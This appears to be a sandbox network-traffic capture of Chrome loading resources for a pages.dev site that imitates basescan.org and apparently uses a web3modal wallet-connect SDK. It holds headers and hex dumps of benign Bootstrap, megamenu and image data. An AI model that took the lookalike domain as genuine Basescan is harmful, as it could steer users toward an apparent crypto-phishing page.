                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC614OUTGET /assets/vendor/bootstrap/bootstrap.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 08 Feb 2023 11:53:00 GMT
                                                                                                                                                                                                                                              ETag: W/"07653e4b33bd91:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58862
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FQJIi8JQzSBt82kmUKrZ2bBPA%2FqhcqnRuXOnDHqU1XW5o4QmLVWTqfLHISoh4NcJSa%2BXpgQz%2FyxRiXyrfbdvfx43rswetgt4akvvFq5NCX7tKgCzFWvV2UE1d52Npw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2db5c8d19d3-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC554INData Raw: 37 63 37 32 0d 0a 2f 2a 21 0d 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 32 2e 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0d 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0d 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 20 2a 2f 0d 0a 21 66 75 6e 63 74 69
                                                                                                                                                                                                                                              Data Ascii: 7c72/*! * Bootstrap v5.2.1 (https://getbootstrap.com/) * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!functi
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 74 3b 63 6f 6e 73 74 20 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 2c 7b 5b 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 5d 3a 7b 76 61 6c 75 65 3a 22 4d 6f 64 75 6c 65 22 7d 7d 29 3b 69 66 28 74 29 66 6f 72 28 63 6f 6e 73 74 20 69 20 69 6e 20 74 29 69 66 28 22 64 65 66 61 75 6c 74 22 21 3d 3d 69 29 7b 63 6f 6e 73 74 20 73 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 69 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 69 2c 73 2e 67 65 74 3f 73 3a 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 28 29 3d 3e 74 5b 69 5d 7d 29 7d 72 65 74 75 72 6e 20 65 2e 64 65 66 61 75 6c
                                                                                                                                                                                                                                              Data Ascii: &t.__esModule)return t;const e=Object.create(null,{[Symbol.toStringTag]:{value:"Module"}});if(t)for(const i in t)if("default"!==i){const s=Object.getOwnPropertyDescriptor(t,i);Object.defineProperty(e,i,s.get?s:{enumerable:!0,get:()=>t[i]})}return e.defaul
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 74 2e 61 74 74 61 63 68 53 68 61 64 6f 77 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 52 6f 6f 74 4e 6f 64 65 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 67 65 74 52 6f 6f 74 4e 6f 64 65 28 29 3b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 68 61 64 6f 77 52 6f 6f 74 3f 65 3a 6e 75 6c 6c 7d 72 65 74 75 72 6e 20 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 68 61 64 6f 77 52 6f 6f 74 3f 74 3a 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 75 28 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 3a 6e 75 6c 6c 7d 2c 5f 3d 28 29 3d 3e 7b 7d 2c 67 3d 74 3d 3e 7b 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7d 2c 66 3d 28 29 3d 3e 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 26 26 21 64 6f 63 75 6d 65 6e 74
                                                                                                                                                                                                                                              Data Ascii: t.attachShadow)return null;if("function"==typeof t.getRootNode){const e=t.getRootNode();return e instanceof ShadowRoot?e:null}return t instanceof ShadowRoot?t:t.parentNode?u(t.parentNode):null},_=()=>{},g=t=>{t.offsetHeight},f=()=>window.jQuery&&!document
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 6f 75 74 22 7d 2c 49 3d 6e 65 77 20 53 65 74 28 5b 22 63 6c 69 63 6b 22 2c 22 64 62 6c 63 6c 69 63 6b 22 2c 22 6d 6f 75 73 65 75 70 22 2c 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 22 63 6f 6e 74 65 78 74 6d 65 6e 75 22 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 2c 22 44 4f 4d 4d 6f 75 73 65 53 63 72 6f 6c 6c 22 2c 22 6d 6f 75 73 65 6f 76 65 72 22 2c 22 6d 6f 75 73 65 6f 75 74 22 2c 22 6d 6f 75 73 65 6d 6f 76 65 22 2c 22 73 65 6c 65 63 74 73 74 61 72 74 22 2c 22 73 65 6c 65 63 74 65 6e 64 22 2c 22 6b 65 79 64 6f 77 6e 22 2c 22 6b 65 79 70 72 65 73 73 22 2c 22 6b 65 79 75 70 22 2c 22 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 22 2c 22 74 6f 75 63 68 73 74 61 72 74 22 2c 22 74 6f 75 63 68 6d 6f 76 65 22 2c 22 74 6f 75 63 68 65 6e 64 22 2c 22 74 6f 75 63 68 63
                                                                                                                                                                                                                                              Data Ascii: out"},I=new Set(["click","dblclick","mouseup","mousedown","contextmenu","mousewheel","DOMMouseScroll","mouseover","mouseout","mousemove","selectstart","selectend","keydown","keypress","keyup","orientationchange","touchstart","touchmove","touchend","touchc
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 66 20 6f 29 69 66 28 61 3d 3d 3d 72 29 72 65 74 75 72 6e 20 46 28 6e 2c 7b 64 65 6c 65 67 61 74 65 54 61 72 67 65 74 3a 72 7d 29 2c 73 2e 6f 6e 65 4f 66 66 26 26 24 2e 6f 66 66 28 74 2c 6e 2e 74 79 70 65 2c 65 2c 69 29 2c 69 2e 61 70 70 6c 79 28 72 2c 5b 6e 5d 29 7d 7d 28 74 2c 69 2c 72 29 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 69 28 73 29 7b 72 65 74 75 72 6e 20 46 28 73 2c 7b 64 65 6c 65 67 61 74 65 54 61 72 67 65 74 3a 74 7d 29 2c 69 2e 6f 6e 65 4f 66 66 26 26 24 2e 6f 66 66 28 74 2c 73 2e 74 79 70 65 2c 65 29 2c 65 2e 61 70 70 6c 79 28 74 2c 5b 73 5d 29 7d 7d 28 74 2c 72 29 3b 75 2e 64 65 6c 65 67 61 74 69 6f 6e 53 65 6c 65 63 74 6f 72 3d 6f 3f 69 3a 6e 75 6c 6c 2c 75 2e 63 61 6c 6c 61 62 6c 65 3d
                                                                                                                                                                                                                                              Data Ascii: f o)if(a===r)return F(n,{delegateTarget:r}),s.oneOff&&$.off(t,n.type,e,i),i.apply(r,[n])}}(t,i,r):function(t,e){return function i(s){return F(s,{delegateTarget:t}),i.oneOff&&$.off(t,s.type,e),e.apply(t,[s])}}(t,r);u.delegationSelector=o?i:null,u.callable=
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 70 61 74 63 68 45 76 65 6e 74 28 6c 29 2c 6c 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 26 26 6e 26 26 6e 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6c 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 46 28 74 2c 65 29 7b 66 6f 72 28 63 6f 6e 73 74 5b 69 2c 73 5d 6f 66 20 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 65 7c 7c 7b 7d 29 29 74 72 79 7b 74 5b 69 5d 3d 73 7d 63 61 74 63 68 28 65 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 28 29 3d 3e 73 7d 29 7d 72 65 74 75 72 6e 20 74 7d 63 6f 6e 73 74 20 7a 3d 6e 65 77 20 4d 61 70 2c 48 3d 7b 73 65 74 28 74 2c 65 2c 69 29 7b 7a 2e 68 61 73 28 74 29 7c 7c 7a 2e 73 65 74 28 74 2c 6e 65 77 20 4d 61 70 29
                                                                                                                                                                                                                                              Data Ascii: patchEvent(l),l.defaultPrevented&&n&&n.preventDefault(),l}};function F(t,e){for(const[i,s]of Object.entries(e||{}))try{t[i]=s}catch(e){Object.defineProperty(t,i,{configurable:!0,get:()=>s})}return t}const z=new Map,H={set(t,e,i){z.has(t)||z.set(t,new Map)
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 73 74 61 74 69 63 20 67 65 74 20 4e 41 4d 45 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 59 6f 75 20 68 61 76 65 20 74 6f 20 69 6d 70 6c 65 6d 65 6e 74 20 74 68 65 20 73 74 61 74 69 63 20 6d 65 74 68 6f 64 20 22 4e 41 4d 45 22 2c 20 66 6f 72 20 65 61 63 68 20 63 6f 6d 70 6f 6e 65 6e 74 21 27 29 7d 5f 67 65 74 43 6f 6e 66 69 67 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 68 69 73 2e 5f 6d 65 72 67 65 43 6f 6e 66 69 67 4f 62 6a 28 74 29 2c 74 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 41 66 74 65 72 4d 65 72 67 65 28 74 29 2c 74 68 69 73 2e 5f 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 74 29 2c 74 7d 5f 63 6f 6e 66 69 67 41 66 74 65 72 4d 65 72 67 65 28 74 29 7b 72 65 74 75 72 6e 20 74 7d 5f 6d 65 72 67 65
                                                                                                                                                                                                                                              Data Ascii: (){return{}}static get NAME(){throw new Error('You have to implement the static method "NAME", for each component!')}_getConfig(t){return t=this._mergeConfigObj(t),t=this._configAfterMerge(t),this._typeCheckConfig(t),t}_configAfterMerge(t){return t}_merge
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 7d 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 49 6e 73 74 61 6e 63 65 28 74 29 7c 7c 6e 65 77 20 74 68 69 73 28 74 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 6e 75 6c 6c 29 7d 73 74 61 74 69 63 20 67 65 74 20 56 45 52 53 49 4f 4e 28 29 7b 72 65 74 75 72 6e 22 35 2e 32 2e 31 22 7d 73 74 61 74 69 63 20 67 65 74 20 44 41 54 41 5f 4b 45 59 28 29 7b 72 65 74 75 72 6e 60 62 73 2e 24 7b 74 68 69 73 2e 4e 41 4d 45 7d 60 7d 73 74 61 74 69 63 20 67 65 74 20 45 56 45 4e 54 5f 4b 45 59 28 29 7b 72 65 74 75 72 6e 60 2e 24 7b 74 68 69 73 2e 44 41 54 41 5f 4b 45 59 7d 60 7d 73 74 61 74 69 63 20 65 76 65 6e 74 4e 61 6d 65 28 74 29 7b 72 65 74 75 72 6e 60 24 7b 74 7d 24 7b 74 68 69 73 2e 45 56 45 4e 54 5f 4b 45 59 7d 60 7d 7d 63 6f 6e 73 74
                                                                                                                                                                                                                                              Data Ascii: }){return this.getInstance(t)||new this(t,"object"==typeof e?e:null)}static get VERSION(){return"5.2.1"}static get DATA_KEY(){return`bs.${this.NAME}`}static get EVENT_KEY(){return`.${this.DATA_KEY}`}static eventName(t){return`${t}${this.EVENT_KEY}`}}const
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 59 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 68 69 73 29 3b 22 74 6f 67 67 6c 65 22 3d 3d 3d 74 26 26 65 5b 74 5d 28 29 7d 29 29 7d 7d 24 2e 6f 6e 28 64 6f 63 75 6d 65 6e 74 2c 22 63 6c 69 63 6b 2e 62 73 2e 62 75 74 74 6f 6e 2e 64 61 74 61 2d 61 70 69 22 2c 58 2c 28 74 3d 3e 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 63 6f 6e 73 74 20 65 3d 74 2e 74 61 72 67 65 74 2e 63 6c 6f 73 65 73 74 28 58 29 3b 59 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 65 29 2e 74 6f 67 67 6c 65 28 29 7d 29 29 2c 62 28 59 29 3b 63 6f 6e 73 74 20 55 3d 7b 66 69 6e 64 3a 28 74 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65
                                                                                                                                                                                                                                              Data Ascii: .each((function(){const e=Y.getOrCreateInstance(this);"toggle"===t&&e[t]()}))}}$.on(document,"click.bs.button.data-api",X,(t=>{t.preventDefault();const e=t.target.closest(X);Y.getOrCreateInstance(e).toggle()})),b(Y);const U={find:(t,e=document.documentEle
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 28 29 29 7d 73 74 61 74 69 63 20 67 65 74 20 44 65 66 61 75 6c 74 28 29 7b 72 65 74 75 72 6e 20 47 7d 73 74 61 74 69 63 20 67 65 74 20 44 65 66 61 75 6c 74 54 79 70 65 28 29 7b 72 65 74 75 72 6e 20 4a 7d 73 74 61 74 69 63 20 67 65 74 20 4e 41 4d 45 28 29 7b 72 65 74 75 72 6e 22 73 77 69 70 65 22 7d 64 69 73 70 6f 73 65 28 29 7b 24 2e 6f 66 66 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 22 2e 62 73 2e 73 77 69 70 65 22 29 7d 5f 73 74 61 72 74 28 74 29 7b 74 68 69 73 2e 5f 73 75 70 70 6f 72 74 50 6f 69 6e 74 65 72 45 76 65 6e 74 73 3f 74 68 69 73 2e 5f 65 76 65 6e 74 49 73 50 6f 69 6e 74 65 72 50 65 6e 54 6f 75 63 68 28 74 29 26 26 28 74 68 69 73 2e 5f 64 65 6c 74 61 58 3d 74 2e 63 6c 69 65 6e 74 58 29 3a 74 68 69 73 2e 5f 64 65 6c 74 61 58 3d 74 2e 74 6f
                                                                                                                                                                                                                                              Data Ascii: ())}static get Default(){return G}static get DefaultType(){return J}static get NAME(){return"swipe"}dispose(){$.off(this._element,".bs.swipe")}_start(t){this._supportPointerEvents?this._eventIsPointerPenTouch(t)&&(this._deltaX=t.clientX):this._deltaX=t.to


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              85192.168.2.549828104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC806OUTGET /public/getAssetImage/692ed6ba-e569-459a-556a-776476829e00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC781INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 1962
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2db7b15426b-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 19070
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cfaRKjj98wG78-Q94g8ciN3whHUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:06 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              cf-bgj: imgq:86,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=370+16 c=0+16 v=2024.9.3 l=1962 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC588INData Raw: 52 49 46 46 a2 07 00 00 57 45 42 50 56 50 38 20 96 07 00 00 10 4e 00 9d 01 2a 90 01 90 01 3e 49 24 90 45 a2 a2 21 92 5d 14 14 28 04 84 b4 b7 70 bb 00 86 71 8d 89 7c 9d a5 a5 eb 7f 99 fb 37 c7 96 33 3b 91 44 88 60 dc 07 a1 7c 82 a7 3a 1a 67 c3 2f 90 54 e7 43 4c f8 65 f2 0a 9c e8 69 9f 0c be 41 53 9d 0d 33 e1 97 c8 2a 73 a1 a6 7c 27 34 0f 42 f9 05 4e 74 34 cf 86 5e e2 88 d1 d5 e6 3d a5 c7 c5 a7 fb 1d 84 b7 0c be 41 53 9d 0d 33 e1 96 ec 8a c7 b5 78 33 e7 49 42 c1 03 70 cb e4 15 39 d0 d3 3d a6 ac 92 0a 89 da 4a 95 93 92 2a a2 62 77 c2 be 41 53 9d 0d 33 e1 97 01 e2 eb ca e6 c2 3c e5 93 01 ff 69 d7 59 67 c3 2f 90 54 e7 43 3d f3 30 64 6f 61 b6 97 7f 76 ef 59 53 5d c0 7a 17 c8 2a 70 c1 63 2d 3e 49 da 8a 8c 47 3f f7 09 78 f9 8c dc 32 f9 05 4e 73 b7 6e c2 e0 b9 90
                                                                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8 N*>I$E!](pq|73;D`|:g/TCLeiAS3*s|'4BNt4^=AS3x3IBp9=J*bwAS3<iYg/TC=0doavYS]z*pc->IG?x2Nsn
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 6c a8 15 ea 5f 26 0f 33 4f 4e 19 7c 82 a7 3a 1a 67 c3 2f 8d b5 c1 c4 46 0d 1a 67 c3 2f 90 54 e7 43 4c f8 65 f2 0a 9c e8 69 9f 0c be 41 53 9d 0d 33 e1 97 c8 2a 73 a1 a6 7c 32 f9 05 4e 74 34 ce 00 00 fe ff bf e5 fe a7 41 26 0f b7 04 09 f9 51 81 1a 64 01 4f 0e 80 08 01 76 25 81 66 02 c6 50 44 d0 b7 1d ab eb ab 34 42 0b 61 c8 77 bb 79 16 77 89 a1 20 18 43 c4 bb 8a c2 50 0a ac c9 19 02 e5 59 43 6a 71 7f 0b 94 38 fa f8 7b 3c 70 36 1c 63 d0 cc 02 20 f9 75 d8 bb 23 0e 20 87 0c 48 57 9e 85 b6 46 78 4c 1f 80 aa 2a 66 84 cc 39 b0 73 a6 32 84 4f 0f 63 5f 46 58 43 64 1e a3 c8 c1 84 7a b6 e4 9f 4e 8b 00 3d 63 05 c7 3c dc 34 ca 69 65 f1 45 b6 1d 34 08 9b 8c 06 09 f6 ca 88 ed a5 4c 5a 90 ad 2b 3d 46 dc d3 08 be 98 88 45 92 9d 22 ac c3 dd 3a 21 34 85 9c 34 68 1e 0d ae 71
                                                                                                                                                                                                                                              Data Ascii: l_&3ON|:g/Fg/TCLeiAS3*s|2Nt4A&QdOv%fPD4Bawyw CPYCjq8{<p6c u# HWFxL*f9s2Oc_FXCdzN=c<4ieE4LZ+=FE":!44hq
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC5INData Raw: 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              86192.168.2.549829104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC618OUTGET /assets/vendor/hs-megamenu/src/hs.megamenu.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC881INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 13346
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=23720
                                                                                                                                                                                                                                              ETag: "04cba5f7f16d51:0"
                                                                                                                                                                                                                                              Last-Modified: Thu, 30 May 2019 00:34:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58862
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AhhG1PSM%2BAPJDfb3lKXh4lwNxesokoX%2BJHmms7agAv%2FTwYcSk778tw7pu62X0TRCcRcmtXkwtmieUgtF7ejn7GKbGVGnaD74X%2F47ZygQJ%2Fbemlz7eT%2F3o4Xv6wSRTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2dbeb65197c-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC488INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 76 61 72 20 4d 65 67 61 4d 65 6e 75 3d 77 69 6e 64 6f 77 2e 4d 65 67 61 4d 65 6e 75 7c 7c 7b 7d 3b 4d 65 67 61 4d 65 6e 75 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 4d 65 67 61 4d 65 6e 75 28 65 6c 65 6d 65 6e 74 2c 6f 70 74 69 6f 6e 73 29 7b 76 61 72 20 73 65 6c 66 3d 74 68 69 73 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3d 24 28 65 6c 65 6d 65 6e 74 29 3b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 24 2e 65 78 74 65 6e 64 28 74 72 75 65 2c 7b 7d 2c 4d 65 67 61 4d 65 6e 75 2e 64 65 66 61 75 6c 74 73 2c 6f 70 74 69 6f 6e 73 29 3b 74 68 69 73 2e 5f 69 74 65 6d 73 3d 24 28 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 74 68 69
                                                                                                                                                                                                                                              Data Ascii: ;(function($){'use strict';var MegaMenu=window.MegaMenu||{};MegaMenu=(function(){function MegaMenu(element,options){var self=this;this.$element=$(element);this.options=$.extend(true,{},MegaMenu.defaults,options);this._items=$();Object.defineProperties(thi
